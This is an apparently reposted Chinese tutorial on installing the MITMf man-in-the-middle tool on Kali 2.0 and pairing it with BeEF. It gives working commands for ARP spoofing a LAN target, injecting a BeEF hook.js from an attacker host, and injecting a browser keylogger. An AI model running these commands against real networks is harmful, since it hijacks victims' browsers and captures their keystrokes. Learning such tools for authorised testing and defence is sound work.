Mitmf
来源:互联网 发布:打字软件 编辑:程序博客网 时间:2024/05/16 23:56
本篇文章主要参考即刻安全《强大的内网劫持框架之MITMf》
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装,在之前的版本有安装。
Kali2.0下直接安装也行,阅读到这里可以直接跳到图(apt-get install mitmf)
本地环境:windows xp professional+IE6 kali2.0
首先,我们先进行工具依赖包的安装。打开 terminal 终端,输入如下命令:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
以上结果出现一些安装包无法安装的情况,这里我们无需理会,继续我们的下一步操作即可。
依赖包安装完成后,就可以开始安装Mitmf 了、输入命令:
apt-get install mitmf
不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过,那么先卸载之前的版本。输入命令:
pip uninstall twisted
并用 wget 命令进行下载。
wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
安装 twisted 。
pip install ./Twisted-15.5.0.tar.bz2
这样,我们就可以正常使用 mitmf 了。
下面让我们运行 beef 来调用 beef 强大的 hook 脚本。首先我们进入beef目录并启动它。
cd /usr/share/beef-xss
./beef
Beef的使用可以参考其他资料
可以直接安装
我们在浏览器打开UI界面后,下面我们就用 mitmf 进行中间人攻击。输入如下命令:
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.100 --inject --js-url http://192.168.15.131:3000/hook.js
这条命令的原理是,利用ARP进行地址欺骗,让局域网中的其他电脑,误认为Kali为网关路由。当目标机器打开;浏览器,就会被注入 hook 脚本。之后便可在beef上进行客户端的控制。
mitmf 不仅能和 beef来结合使用。自身还有许多强大的功能。例如软件自带的 键盘记录功能。输入命令:
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100–jskeylogger
最后,在介绍个mitmf 一个有趣的恶搞功能。它可以使目标浏览网页时,所有的图片都倒转 180度。是不是很有意思!
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –upsidedownternet
参考资料:
http://www.secist.com/archives/1056.html
https://github.com/byt3bl33d3r/MITMf
http://www.freebuf.com/sectool/45796.html
- Mitmf
- MITMf安装过程
- 渗透工具之mitmf
- 渗透工具之mitmf 详解
- Ubuntu kylin 上MITMF安装笔记
- 内网劫持渗透利器——MITMf指南
- 内网劫持渗透新姿势:MITMf简要指南
- Ubuntu中运行MITMF报错:Unable to start DNS server on port 53
- Kali下安装mitmf错误解决办法(其他系统可能同理)
- eclipse 工作台右下区域 其他视图区域 乱码解决办法
- 抽象泄漏定律
- Redis 备份、容灾及高可用实战
- 阿里云云服务器(ECS)入门必踩坑系列-安全组
- rt
- Mitmf
- Qt布局、文件会话框操作
- rpcinfo -- 报告 RPC 信息
- ♪ ♩ ♫ 海的声音-E=核心算法*大量重复动作²
- Qt编写的计算器
- 水晶报表 (Crystal Reports) code128 条形码 保存为PDF后 不显示条形码的 解决办法
- eclipse不提示错误问题
- Qt编写的猜数字小游戏
- 渲染流程